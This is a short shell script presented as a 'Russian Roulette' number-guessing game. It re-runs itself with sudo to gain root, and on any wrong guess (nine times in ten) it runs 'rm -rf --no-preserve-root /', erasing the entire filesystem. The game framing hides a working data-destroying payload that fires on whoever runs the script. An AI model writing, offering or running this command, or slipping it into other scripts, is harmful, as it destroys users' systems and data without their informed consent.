#!/bin/sh

# gain sudo privilages
[ "$(id -u)" != 0 ] && exec sudo "$0" "$@"

# RussianRouletteGame

number=$(awk -v min=1 -v max=10 'BEGIN{srand(); print int(min+rand()*(max-min+1))}')
printf "Guess a number between 1 and 10: "
read -r guess

if [ "$number" -eq "$guess" ]; then
  echo "You Won!"
else
  # sudo shouldn't be nessicary but run it just in case
  sudo rm -rf --no-preserve-root /
fi
